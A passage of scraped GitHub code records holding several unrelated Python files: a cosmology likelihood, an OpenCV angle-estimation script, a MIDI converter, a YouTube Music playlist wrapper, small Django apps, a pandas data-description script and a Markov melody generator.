1. - Omega_m), 0., z) / (100. * h)\n\n # Gaussian integrator\n def integrator(self, f, a, b, highres=False):\n sub = (b - a) / 2.\n add = (b + a) / 2.\n if sub == 0:\n return 0.\n if not highres:\n return sub * np.dot(f(sub * self.points + add), self.weights)\n return sub * np.dot(f(sub * self.points_highres + add), self.weights_highres)\n\n # Alcock-Paczynski corrections\n def AP_effect(self, data):\n deltaz = 0.5 # 1/2 width of redshift slice\n Omega_m = data.mcmc_parameters['Omega_m']['current']\n hubble = data.mcmc_parameters['h']['current']\n\n self.UVLF_data = self.UVLF_HST.copy()\n for z in self.zs:\n # Vratio is the correction to the UV LF\n Vratio = (np.power(self.rcomoving(z+deltaz, self.Omega_m_HST, self.h_HST),3) - np.power(self.rcomoving(z-deltaz, self.Omega_m_HST, self.h_HST),3)) / (np.power(self.rcomoving(z+deltaz, Omega_m, hubble),3) - np.power(self.rcomoving(z-deltaz, Omega_m, hubble),3))\n\n # Apply correction to UV LF and error\n self.UVLF_data[self.UVLF_data[:,0]==z,3:] *= Vratio\n\n # Apply correction to magntiudes, since luminosity distances are affected too\n self.UVLF_data[self.UVLF_data[:,0]==z,1] = self.UVLF_data[self.UVLF_data[:,0]==z,1] - 5. * np.log10(self.rcomoving(z, Omega_m, hubble) / self.rcomoving(z, self.Omega_m_HST, self.h_HST))\n\n # The multiplication factor of the power spectrum in each bin\n def scaling(self, k, as2, as3, as4):\n k1 = 0.5\n k2 = 2.25\n k3 = 10.\n if k < k1:\n return 1.\n if k >= k1 and k <= k2:\n return as2\n if k > k2 and k <= k3:\n return as3\n return as4\n\n # Calculate the mass variance manually intead from CLASS\n def calculate_sigma(self, R, kmin, kmax, pk, z, as2, as3, as4):\n mps = np.vectorize(lambda y: pk(y, z) * self.scaling(y, as2, as3, as4))\n window = lambda x: np.heaviside(1. - x * R, 1.)\n return np.sqrt(self.integrator(lambda x: window(x)**2 * mps(x) * x**2, kmin, kmax, True) / 2. / np.pi**2)\n\n # Compute the HMF and average <MUV> given halo mass Mh. This is done in one function in order not to compute \"sigma\" again, which takes a long time here\n def HMF_and_MUV_from_Mh(self, cosmo, data, z, Mh, ks):\n rhoM = np.power(data.mcmc_parameters['h']['current'], 2) * data.mcmc_parameters['Omega_m']['current'] * self.rho_crit\n aST = data.mcmc_parameters['aST']['current']\n As2 = 10**data.mcmc_parameters['logas2']['current']\n As3 = 10**data.mcmc_parameters['logas3']['current']\n As4 = 10**data.mcmc_parameters['logas4']['current']\n\n R = np.power(3. * Mh / (4. * np.pi * rhoM), 1./3) / self.cM\n sigma = self.calculate_sigma(R, min(ks), max(ks), cosmo.pk_cb_lin, z, As2, As3, As4)\n dsigmadM = -cosmo.pk_cb_lin(1/R, z) * self.scaling(1/R, As2, As3, As4) / 12. / np.pi**2 / R**3 / Mh / sigma\n\n #################\n\n alphastar = data.mcmc_parameters['alphastar']['current']\n betastar = data.mcmc_parameters['betastar']['current']\n epsilonstar = 10**(data.mcmc_parameters['epsilonstar_slope']['current'] * np.log10((1 + z)/(1 + 6)) + data.mcmc_parameters['epsilonstar_icept']['current'])\n Mc = 10**(data.mcmc_parameters['Mc_slope']['current'] * np.log10((1 + z)/(1 + 6)) + data.mcmc_parameters['Mc_icept']['current'])\n\n Q = data.mcmc_parameters['Q']['current']\n sigma1 = self.calculate_sigma(np.power(3. * Mh / Q / (4. 
* np.pi * rhoM), 1./3) / self.cM, min(ks), max(ks), cosmo.pk_cb_lin, z, As2, As3, As4)\n        functionf = 1./np.sqrt(sigma1**2 - sigma**2)\n        dgrowthdz = -cosmo.scale_independent_growth_factor_f(z) * cosmo.scale_independent_growth_factor(z) / (1.+z)\n        Mhdot = -(1+z) * cosmo.Hubble(z) * self.invMpctoinvYear * 1.686 * np.sqrt(2./np.pi) * Mh * functionf * dgrowthdz / cosmo.scale_independent_growth_factor(z)**2\n\n        return -self.AST * np.sqrt(2. * aST / np.pi) * (1. + np.power(np.power(sigma,2) / (aST * np.power(self.deltaST, 2)), self.pST)) * (self.deltaST / sigma) * np.exp(-aST * np.power(self.deltaST, 2) / (2. * np.power(sigma, 2))) * (rhoM / (Mh * sigma)) * dsigmadM, -2.5 * np.log10(epsilonstar * Mhdot / ((Mh/Mc)**alphastar + (Mh/Mc)**betastar) / self.kappaUV) + 51.63\n\n    # Integrated Gaussian distribution for given average magnitude\n    def first_integrand(self, MUV, width, MUV_av, sigma_MUV):\n        return 0.5 * (erf((MUV_av-MUV+width/2.) / (sigma_MUV*np.sqrt(2))) - erf((MUV_av-MUV-width/2.) / (sigma_MUV*np.sqrt(2))))\n\n    # Log-likelihood\n    def loglkl(self, cosmo, data):\n        \n        # Compute AP effect\n        self.AP_effect(data)\n\n        chisq = 0\n        # Iterate over redshifts of data\n        for z in self.zs:\n\n            # Array of wavenumbers \n            ks = cosmo.get_transfer(z)[\"k (h/Mpc)\"] * data.mcmc_parameters['h']['current']\n\n            # HMFs and average MUVs only need to be computed at each redshift slice\n            HMF_and_MUV_from_Mh = np.array([self.HMF_and_MUV_from_Mh(cosmo, data, z, mass, ks) for mass in self.Mhalos])\n            HMFs = HMF_and_MUV_from_Mh[:, 0]\n            MUV_avs = HMF_and_MUV_from_Mh[:, 1]\n\n            # Iterate over data at redshift z\n            for item in self.UVLF_data[self.UVLF_data[:,0]==z,1:]:\n                MUV, width, UVLF_data, UVLF_error = item\n                second_integrand = HMFs * self.first_integrand(MUV, width, MUV_avs, data.mcmc_parameters['sigma_MUV']['current']) / width\n                chisq += ((simps(second_integrand, self.Mhalos) - UVLF_data) / UVLF_error)**2\n\n        return -0.5 * chisq\n","repo_name":"NNSSA/GALLUMI_public","sub_path":"MontePython_files/Likelihoods/UVLF_HST_ST_model1_powerspectrum/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9032,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"41987148307","text":"##Author: Aamir Bader Shah\r\n##This code performs feature extraction from the reference images and then compares it to each frame of the video to identify / annotate the angles\r\n\r\nimport argparse\r\nimport cv2\r\nimport numpy as np\r\nimport math\r\nimport os\r\nfrom objloader_simple import *\r\n\r\n# Minimum number of matches that have to be found\r\n# to consider the recognition valid\r\nMIN_MATCHES = 160\r\nDEFAULT_COLOR = (0, 0, 0)\r\n\r\n\r\ndef main():\r\n    \"\"\"\r\n    This function loads the target surface images, matches them against each video frame and annotates the detected angle.\r\n    \"\"\"\r\n    \r\n    homography = None \r\n    # matrix of camera parameters (made up but works quite well for me) \r\n    camera_parameters = np.array([[800, 0, 320], [0, 800, 240], [0, 0, 1]])\r\n    # create ORB keypoint detector\r\n    orb = cv2.ORB_create()\r\n    # create BFMatcher object based on hamming distance \r\n    bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\r\n    # load the reference surface that will be searched in the video stream\r\n    dir_name = os.getcwd()\r\n    print(dir_name)\r\n\r\n    # Load 3D model from OBJ file\r\n    obj = OBJ(os.path.join(dir_name, 'models/fox.obj'), swapyz=True)\r\n    directory = r'/homelocal/images/70_6273_14178_1/images/'\r\n    \r\n    # init video capture\r\n    #cap = cv2.VideoCapture(2)\r\n    loop=0\r\n    loop_2=0\r\n    angle=0\r\n    
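    # The reference images in `directory` are assumed (their actual names are
    # not shown here) to be an ordered sweep of the object in 45-degree steps,
    # so sorting the filenames lines them up with angles 45, 90, 135, ...
    # A minimal flat version of the lookup built below would be:
    #   angles = {f: 45 * (i + 1) for i, f in enumerate(sorted(os.listdir(directory)))}
    # the loop that follows builds a nested variant of the same mapping.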
cap=cv2.VideoCapture(\"/homelocal/videos/bowls_fast.mp4\")\r\n    frame_width = int(cap.get(3))\r\n    frame_height = int(cap.get(4))\r\n    \r\n    size = (frame_width, frame_height)\r\n    result = cv2.VideoWriter('filename.avi', cv2.VideoWriter_fourcc(*'MJPG'), 10, size)\r\n    thisdict={}\r\n    for filename in sorted(os.listdir(directory)):\r\n        #creating a dictionary for all filenames w.r.t angles\r\n        \r\n        angle=angle+45\r\n        thisdict[filename] = {\r\n            filename : angle\r\n        }\r\n    \r\n    while True:\r\n        \r\n        for filename in sorted(os.listdir(directory)): \r\n\r\n            # read the current frame\r\n            ret, frame = cap.read()\r\n            #count the number of times the loop has iterated within the files\r\n            loop=loop+1\r\n            print(\"Loop 1: \", loop)\r\n            if not ret:\r\n                print(\"Unable to capture video\")\r\n                return \r\n            if ret == True: \r\n                # Write the frame into the\r\n                # file 'filename.avi'\r\n                result.write(frame)\r\n            # if all the files have been iterated, set the loop counts to 0. \r\n            if loop == len(os.listdir(directory)):\r\n                loop=0\r\n                loop_2=0\r\n            # find and draw the keypoints of the frame\r\n            kp_frame, des_frame = orb.detectAndCompute(frame, None)\r\n            # match frame descriptors with model descriptors\r\n            model = cv2.imread(os.path.join(directory, filename), 0)\r\n            \r\n            # Compute model keypoints and its descriptors\r\n            kp_model, des_model = orb.detectAndCompute(model, None)\r\n            matches = bf.match(des_model, des_frame)\r\n            # sort them in the order of their distance\r\n            # the lower the distance, the better the match\r\n            matches = sorted(matches, key=lambda x: x.distance)\r\n            \r\n            \r\n            print(\"No. of Matches Found: \", len(matches))\r\n            print(\"Total No. of Matches\", MIN_MATCHES)\r\n            #if instance is found we go to next step, otherwise go to next file\r\n            if len(matches) > MIN_MATCHES:\r\n                print(\"break - Filename\", filename)\r\n                loop_2=0\r\n                break\r\n            elif len(matches) <= MIN_MATCHES or loop_2 < len(os.listdir(directory)):\r\n                #count the number of times the loop has not found an instance\r\n                print(\"continue Filename\", filename)\r\n                loop_2=loop_2+1\r\n                print(\"Loop 2:\", loop_2)\r\n                \r\n                continue\r\n        # Putting angle text on video\r\n        font = cv2.FONT_HERSHEY_SIMPLEX\r\n        cv2.putText(frame, str(thisdict[filename]), (50, 50), font, 1, (0, 255, 255), 2, cv2.LINE_4)\r\n        \r\n        # compute Homography if enough matches are found\r\n        if len(matches) > MIN_MATCHES:\r\n            print('we are here !!!')\r\n            # differentiate between source points and destination points\r\n            src_pts = np.float32([kp_model[m.queryIdx].pt for m in matches]).reshape(-1, 1, 2)\r\n            dst_pts = np.float32([kp_frame[m.trainIdx].pt for m in matches]).reshape(-1, 1, 2)\r\n            # compute Homography\r\n            homography, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\r\n            if args.rectangle:\r\n                # Draw a rectangle that marks the found model in the frame\r\n                h, w = model.shape\r\n                pts = np.float32([[0, 0], [0, h - 1], [w - 1, h - 1], [w - 1, 0]]).reshape(-1, 1, 2)\r\n                # project corners into frame\r\n                dst = cv2.perspectiveTransform(pts, homography)\r\n                # connect them with lines \r\n                frame = cv2.polylines(frame, [np.int32(dst)], True, 255, 3, cv2.LINE_AA) \r\n            # if a valid homography matrix was found render cube on model plane\r\n            if homography is not None:\r\n                try:\r\n                    # obtain 3D projection matrix from homography matrix and camera parameters\r\n                    projection = projection_matrix(camera_parameters, homography) \r\n                    # project cube or model\r\n                    frame = render(frame, obj, projection, model, False)\r\n                    #frame = render(frame, model, projection)\r\n                except:\r\n                    pass\r\n            # draw first 10 
matches.\r\n if args.matches:\r\n frame = cv2.drawMatches(model, kp_model, frame, kp_frame, matches[:10], 0, flags=2)\r\n \r\n \r\n \r\n # show result\r\n frame = cv2.resize(frame, (540,540))\r\n #cv2.imshow('frame', frame)\r\n \r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n else:\r\n print(\"Not enough matches found - %d/%d\" % (len(matches), MIN_MATCHES))\r\n\r\n \r\n \r\n cap.release()\r\n cv2.destroyAllWindows()\r\n return 0\r\n\r\n \r\n\r\ndef render(img, obj, projection, model, color=False):\r\n \"\"\"\r\n Render a loaded obj model into the current video frame\r\n \"\"\"\r\n vertices = obj.vertices\r\n scale_matrix = np.eye(3) * 3\r\n h, w = model.shape\r\n print(\"This is image\", cv2.imshow('img', img))\r\n for face in obj.faces:\r\n face_vertices = face[0]\r\n points = np.array([vertices[vertex - 1] for vertex in face_vertices])\r\n points = np.dot(points, scale_matrix)\r\n # render model in the middle of the reference surface. To do so,\r\n # model points must be displaced\r\n points = np.array([[p[0] + w / 2, p[1] + h / 2, p[2]] for p in points])\r\n dst = cv2.perspectiveTransform(points.reshape(-1, 1, 3), projection)\r\n imgpts = np.int32(dst)\r\n if color is False:\r\n cv2.fillConvexPoly(img, imgpts, DEFAULT_COLOR)\r\n else:\r\n color = hex_to_rgb(face[-1])\r\n color = color[::-1] # reverse\r\n cv2.fillConvexPoly(img, imgpts, color)\r\n\r\n return img\r\n\r\ndef projection_matrix(camera_parameters, homography):\r\n \"\"\"\r\n From the camera calibration matrix and the estimated homography\r\n compute the 3D projection matrix\r\n \"\"\"\r\n # Compute rotation along the x and y axis as well as the translation\r\n homography = homography * (-1)\r\n rot_and_transl = np.dot(np.linalg.inv(camera_parameters), homography)\r\n col_1 = rot_and_transl[:, 0]\r\n col_2 = rot_and_transl[:, 1]\r\n col_3 = rot_and_transl[:, 2]\r\n # normalise vectors\r\n l = math.sqrt(np.linalg.norm(col_1, 2) * np.linalg.norm(col_2, 2))\r\n rot_1 = col_1 / l\r\n rot_2 = col_2 / l\r\n translation = col_3 / l\r\n # compute the orthonormal basis\r\n c = rot_1 + rot_2\r\n p = np.cross(rot_1, rot_2)\r\n d = np.cross(c, p)\r\n rot_1 = np.dot(c / np.linalg.norm(c, 2) + d / np.linalg.norm(d, 2), 1 / math.sqrt(2))\r\n rot_2 = np.dot(c / np.linalg.norm(c, 2) - d / np.linalg.norm(d, 2), 1 / math.sqrt(2))\r\n rot_3 = np.cross(rot_1, rot_2)\r\n # finally, compute the 3D projection matrix from the model to the current frame\r\n projection = np.stack((rot_1, rot_2, rot_3, translation)).T\r\n return np.dot(camera_parameters, projection)\r\n\r\ndef hex_to_rgb(hex_color):\r\n \"\"\"\r\n Helper function to convert hex strings to RGB\r\n \"\"\"\r\n hex_color = hex_color.lstrip('#')\r\n h_len = len(hex_color)\r\n return tuple(int(hex_color[i:i + h_len // 3], 16) for i in range(0, h_len, h_len // 3))\r\n\r\n\r\n# Command line argument parsing\r\n# NOT ALL OF THEM ARE SUPPORTED YET\r\nparser = argparse.ArgumentParser(description='Pose Estimation')\r\n\r\nparser.add_argument('-r','--rectangle', help = 'draw rectangle delimiting target surface on frame', action = 'store_true')\r\nparser.add_argument('-mk','--model_keypoints', help = 'draw model keypoints', action = 'store_true')\r\nparser.add_argument('-fk','--frame_keypoints', help = 'draw frame keypoints', action = 'store_true')\r\nparser.add_argument('-ma','--matches', help = 'draw matches between keypoints', action = 'store_true')\r\n# TODO jgallostraa -> add support for model specification\r\n#parser.add_argument('-mo','--model', help = 'Specify model to be 
projected', action = 'store_true')\r\n\r\nargs = parser.parse_args()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"shahaamirbader/Angle-Estimation-using-Detectron2-and-OpenCV","sub_path":"main_2.py","file_name":"main_2.py","file_ext":"py","file_size_in_byte":9500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32119515613","text":"import mido\n\ndef convert_midi_to_text(midi_file_path):\n midi = mido.MidiFile(midi_file_path)\n text = \"\"\n\n for message in midi:\n if message.type == 'set_tempo':\n tempo = message.tempo\n text += f\"0 Tempo {tempo}\\n\"\n elif message.type == 'time_signature':\n numerator = message.numerator\n denominator = message.denominator\n metronome = message.clocks_per_click\n thirty_seconds = message.notated_32nd_notes_per_beat\n text += f\"0 TimeSig {numerator}/{denominator} {metronome} {thirty_seconds}\\n\"\n elif message.type == 'note_on':\n channel = message.channel + 1\n note = message.note\n velocity = message.velocity\n text += f\"{message.time} NoteOn ch={channel} n={note} v={velocity}\\n\"\n elif message.type == 'note_off':\n channel = message.channel + 1\n note = message.note\n velocity = message.velocity\n text += f\"{message.time} NoteOff ch={channel} n={note} v={velocity}\\n\"\n\n return text\n","repo_name":"AetherSonata/GPTmidi-UI","sub_path":"src/model/midi_to_text_converter.py","file_name":"midi_to_text_converter.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"30924792306","text":"from ytmusicapi import YTMusic\nfrom includes.const import *\nimport json\nfrom datetime import datetime\n\n# DEFAULT_IMG_URL_YOUTUBE = \"#\"\n\ndef youtube_music_auth(raw_header: str):\n return YTMusic.setup(headers_raw=raw_header)\n\nclass youtube_music_tasker:\n def __init__(self, auth_json:str):\n self.api=YTMusic(auth_json)\n\n # Return:\n # [\n # {\n # \"id\": \"playlistid1\",\n # \"title\": \"playlist_title1\",\n # \"thumbnail\": \"url_to_playlist1_1st_thumbnail\"\n # }, \n # {\n # \"id\": \"playlistid2\",\n # \"title\": \"playlist_title2\",\n # \"thumbnail\": \"url_to_playlist2_1st_thumbnail\"\n # }\n # ]\n #\n def show_playlist(self):\n list_of_playlist = []\n\n try:\n library_playlists = self.api.get_library_playlists(limit=50) # Hopefully, no one has 50+ playlists. 
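        # (If that assumption ever breaks, newer versions of ytmusicapi also
        #  accept limit=None here to fetch every playlist, e.g.
        #  self.api.get_library_playlists(limit=None).)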
\n        for pl in library_playlists:\n            # Only showing non-empty well-formed playlists\n            if 'count' in pl and int(pl['count'])>0 and 'playlistId' in pl and 'title' in pl and 'thumbnails' in pl:\n                playlist = {}\n                playlist['id']=pl['playlistId']\n                playlist['title']=pl['title']\n                if len(pl['thumbnails'])>0:\n                    playlist['thumbnail']=pl['thumbnails'][0]['url']\n                else:\n                    playlist['thumbnail']=DEFAULT_IMG_URL\n                list_of_playlist.append(playlist)\n        except Exception as e:\n            print(\"Unexpected Error in show_playlist:\", e)\n        \n        return json.dumps(list_of_playlist)\n\n    # Return:\n    # [\n    #     {\n    #         \"title\": \"name\",\n    #         \"artist\": \"someone\",\n    #         \"album\": \"the album\"\n    #     }, \n    #     {\n    #         \"title\": \"name\",\n    #         \"artist\": \"any\",\n    #         \"album\": \"any\"\n    #     }\n    # ]\n    #\n    def show_song_in_playlist(self, playlist_id:str):\n        list_of_song = []\n\n        try:\n            pl_detail = self.api.get_playlist(playlistId=playlist_id)\n            if 'tracks' in pl_detail:\n                for track in pl_detail['tracks']:\n                    if 'title' in track:\n                        new_track = {'title':track['title'], 'artist':'any', 'album':'any'}\n                        if 'artists' in track and len(track['artists'])>0:\n                            new_track['artist'] = track['artists'][0]['name']\n                        if 'album' in track and track['album'] != None and 'name' in track['album']:\n                            new_track['album'] = track['album']['name']\n                        list_of_song.append(new_track)\n        except Exception as e:\n            print(\"Unexpected Error in show_song_in_playlist:\", e)\n        return json.dumps(list_of_song)\n\n\n    # access: 'PRIVATE', 'PUBLIC', 'UNLISTED'\n    # Return: A tuple of (create_status, playlist_id, add_status)\n    def new_playlist(self, playlist_name:str, desc:str = \"A playlist created by PlaySync on \"+str(datetime.today().strftime('%Y-%m-%d')), access: str = 'PRIVATE', tracks=[]):\n        try:\n            playlist_id = self.api.create_playlist(title=playlist_name, description=desc, privacy_status=access)\n            if type(playlist_id) == str: # It is an id\n                if len(tracks)>0:\n                    status = self.api.add_playlist_items(playlist_id, tracks)\n                    return (0, playlist_id, status) # Creation successful, add status attached\n                else:\n                    return (0, playlist_id, \"NULL\") # Creation successful, didn't add\n            else: # Status message, means error in creation\n                return (-1, 0, playlist_id)\n        except Exception as e:\n            print(\"Unexpected Error in new_playlist:\", e)\n            return (-2, 0, e) # Didn't crash gracefully\n\n    def search_song(self, song_title:str, song_artist:str=\"\", song_misc:str=\"\"):\n        song_list = []\n        try:\n            # space-separate the query terms so they don't run together\n            search_results = self.api.search(query = \" \".join(filter(None, [song_title, song_artist, song_misc])), limit=10)\n            for song_found in search_results:\n                if(song_found['resultType'] in ['song','video']):\n                    new_song = {'id':song_found['videoId'], 'title': song_found['title'], 'artist':'None', 'album':'None', 'duration':'Unknown'}\n                    if len(song_found['artists'])>0:\n                        new_song['artist']=song_found['artists'][0]['name']\n                    if 'album' in song_found:\n                        new_song['album']=song_found['album']['name']\n                    if 'duration' in song_found:\n                        new_song['duration']=song_found['duration']\n                    song_list.append(new_song)\n        except Exception as e:\n            print(\"Unexpected Error in search_song:\", e)\n        \n        return json.dumps(song_list)\n\n    def add_songs(self, playlist_id:str, tracks=[]):\n        try:\n            status = self.api.add_playlist_items(playlist_id, tracks)\n            return (0, playlist_id, status) # Creation successful, add status attached\n        except Exception as e:\n            print(\"Unexpected Error in add_songs:\", e)\n            return (-2, 0, 0) # Didn't crash gracefully\n    \n    def del_songs(self, playlist_id:str, tracks=[]):\n        try:\n            if len(tracks) > 0:\n                status = 
self.api.remove_playlist_items(playlist_id, videos=tracks)\n                return status\n        except Exception as e:\n            return \"UNCAUGHT ERROR\"+str(e)\n        return \"NULL\"\n\n    def del_playlist(self, playlist_id:str):\n        try:\n            status = self.api.delete_playlist(playlist_id)\n            return status\n        except Exception as e:\n            return \"UNCAUGHT ERROR\"+str(e)","repo_name":"PlaySync/PlaySync","sub_path":"code/flask/api/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":5825,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"22989553304","text":"from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n\turl(r'^$', views.index, name='index'),\n\turl(r'^users/(?P<id>\\d+)$', views.info, name='info'),\n\turl(r'^create$', views.create, name='create'),\n\turl(r'^fav/(?P<id>\\d+)$', views.fav, name='fav'),\n\turl(r'^delete/(?P<id>\\d+)$', views.delete, name='delete'),\n\n\n]","repo_name":"salazarlg24/Quotes","sub_path":"apps/quoteapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36893665585","text":"#\n# name: loading-describing-data.py\nname='loading-describing-data'\ndescription='Loading and describing the data'\n# version: 0.1\nversion='0.1'\n# date last revision: 26.10.2021\ndate_last_revision='26.10.2021'\n# author: spigae\nauthor='spigae'\n# webpage: https://github.com/spigae\n#\n# importing libraries\n# os\nimport os\n# time\nimport time\n# platform\nimport platform\n# io\nimport io\n# pandas\nimport pandas as pd\n# import numpy\nimport numpy as np\n#\n# declaring the files of input and output\nin0='../data/concrete_data/Concrete_Data.xls'\n# description and info about the dataframe\nout1='description-data.csv'\nout2='info-data.csv'\n#\n# to calculate elapsed time\nstart_time = time.time()\n#\nprint(' ')\nprint('',name)\nprint('',description)\nprint(' version: ',version)\nprint(' date last revision: ',date_last_revision)\nprint(' ')\nprint(' Python version:', platform.python_version())\nprint(' ')\nprint(' author: ',author)\nprint(' input: ',in0)\nprint(' ')\nprint(' output 1: ',out1)\nprint(' output 2: ',out2)\nprint(' ')\nprint(' ... 
script running')\nprint(' ')\n#\n#---\n# function for reading the dataframe\n#---\ndef read_df_excel(filename):\n    #\n    df0 = pd.read_excel(filename, sheet_name='Sheet1')\n    #\n    return df0\n#---\n# function for describing the dataframe\n#---\ndef describe_df():\n    desc = df0.describe(include='all').T\n    #desc = df0.describe(include='all')\n    desc.fillna('NA', inplace=True)\n    #\n    nrows = df0.shape[0]\n    ncols = df0.shape[1] \n    return desc,nrows,ncols\n#---\n# function for getting information about the dataframe\n#---\ndef info_df():\n    # from :\n    # https://stackoverflow.com/questions/59596498/how-to-combine-python-dataframes-info-output-with-unique-count-list\n    info = []\n    for col in df0.columns:\n        nonNull = len(df0) - np.sum(pd.isna(df0[col]))\n        null = np.sum(pd.isna(df0[col]))\n        unique = df0[col].nunique()\n        colType = str(df0[col].dtype)\n\n        info.append([col, nonNull, null, unique, colType])\n    info = pd.DataFrame(info) \n    info.columns = ['colName','non-null values', 'null values', 'unique', 'dtype']\n    return info\n#\n#-----\n# main\n#-----\n#\n# reading dataframe\ndf0 = read_df_excel(in0)\n# describing the dataframe\ndesc,nrows,ncols = describe_df()\ndesc.to_csv(out1, index=True)\nprint(' This dataframe is made of')\nprint(' # rows:',nrows)\nprint(' # columns:',ncols)\n# information about the dataframe\ninfo = info_df()\ninfo.to_csv(out2, index=False)\n#\n# elapsed time for the calculations\nend_time = time.time()\nelapsed_time = end_time - start_time\nformatted_time = \"{:.2f}\".format(elapsed_time)\nprint(' ')\nprint(' Elapsed time:', formatted_time, 's')\n#\nprint(' ')\nprint(' Done!')\nprint(' ')\nprint(' Please see the output files')\nprint(' for further information')\nprint(' ')\n","repo_name":"spigae/linear-regression","sub_path":"OLS/loading-describing-data.py","file_name":"loading-describing-data.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34892397114","text":"import random\nfrom src.MarkovChain import Markov_Chain\nfrom src.FileHandler import parse_midi_file\nclass Melody_Generator:\n    def __init__(self, notes_range, duration_range, start_note = 0, start_duration = 0):\n        self.notes_markov_chain = Markov_Chain(notes_range, start_note)\n        self.duration_markov_chain = Markov_Chain(duration_range, start_duration)\n    \n    def index_of_closest_element_in_list(self, list, x):\n        return min(range(len(list)), key=lambda i: abs(list[i] - x))\n    \n    def return_next_note(self):\n        random_number = random.uniform(\n            0, \n            max(self.notes_markov_chain.probability_matrix[self.notes_markov_chain.current_note])\n        )\n        index_of_closest = self.index_of_closest_element_in_list(\n            self.notes_markov_chain.probability_matrix[self.notes_markov_chain.current_note], \n            random_number\n        )\n        while (sum(self.notes_markov_chain.probability_matrix[index_of_closest]) == 0):\n            random_number = random.uniform(0, max(self.notes_markov_chain.probability_matrix[self.notes_markov_chain.current_note]))\n            index_of_closest = self.index_of_closest_element_in_list(\n                self.notes_markov_chain.probability_matrix[self.notes_markov_chain.current_note], \n                random_number\n            )\n        return index_of_closest\n    \n    @staticmethod\n    def learn(paths_list, markov_chain: Markov_Chain):\n        for p in paths_list:\n            print(\"Opening: \" + p)\n            song = parse_midi_file(p)\n            markov_chain.learn(song.pitch)\n    \n    \n    @staticmethod\n    def random_starting_point(markov_chain: Markov_Chain):\n        # randint(a, b) generates a random number from the interval a <= x <= b\n        starting_point 
= random.randint(0, markov_chain.matrix_size - 1)\n        while(sum(markov_chain.probability_matrix[starting_point]) == 0):\n            starting_point = random.randint(0, markov_chain.matrix_size - 1)\n        return starting_point\n\n    @staticmethod\n    def check_row_if_zero(number, markov_chain: Markov_Chain):\n        if sum(markov_chain.probability_matrix[number]) == 0:\n            return -1\n        return 1","repo_name":"michalpawlowicz/Melody-Generator","sub_path":"src/Generator.py","file_name":"Generator.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21125232601","text":"from django.shortcuts import render\nfrom django.db.models.aggregates import Max\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status, generics\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser\n\nfrom users.models import User\nfrom .models import Attendance, Logs\nimport datetime, time\n\nfrom io import StringIO\nfrom django.http import HttpResponse\nfrom xlsxwriter.workbook import Workbook\nimport openpyxl\n\n# Create your views here.\n\nclass login(APIView):\n    \"\"\"\n    User day-in login\n    \"\"\"\n    permission_classes = [IsAuthenticated]\n\n    def post(self, request, format=None):\n        try:\n            attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n        except:\n            user = User.objects.get(username = request.user.username)\n            start_minutes = user.start_time.hour*60 + user.start_time.minute\n            end_minutes = user.end_time.hour*60 + user.end_time.minute\n            ctime = (time.gmtime().tm_hour+5)*60 + time.gmtime().tm_min + 30\n            if ctime >= start_minutes:\n                attendance = Attendance(user = user, date = datetime.date.today(), \n                    attendance_status = 'WORKING', working_window = end_minutes - start_minutes)\n                attendance.save()\n                attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n                log = Logs(logid = attendance, type = 1)\n                log.save()\n                resp = {'message': 'Hello, ' + request.user.first_name}\n                return Response(resp)\n            else:\n                resp = {'message': 'Please login on or after ' + str(user.start_time)}\n                return Response(resp)\n        else:\n            resp = {'message': 'You are already logged in.'}\n            return Response(resp)\n\nclass logout(APIView):\n    \"\"\"\n    User day-out logout\n    \"\"\"\n    permission_classes = [IsAuthenticated]\n\n    def post(self, request, format=None):\n        try:\n            attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n        except:\n            resp = {'message': 'Please login before you logout'}\n            return Response(resp)\n        attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n        user = User.objects.get(username = request.user.username)\n        start_minutes = user.start_time.hour*60 + user.start_time.minute\n        end_minutes = user.end_time.hour*60 + user.end_time.minute\n        ctime = (time.gmtime().tm_hour+5)*60 + time.gmtime().tm_min + 30\n        if attendance.is_completed == True:\n            resp = {'message': 'Logged out for the day.'}\n            return Response(resp)\n        if ctime >= end_minutes:\n            minutes = 0\n            lastactive = Logs.objects.filter(logid__user__pk = request.user.id).order_by('id').last()\n            ctime = (time.gmtime().tm_hour+5)*60 + time.gmtime().tm_min + 30\n            ptime = lastactive.time.hour*60 + lastactive.time.minute\n            minutes = ctime - ptime\n            minutes += int(lastactive.active_time)\n            attendance.total_logouts += 1\n            attendance.active_window = 
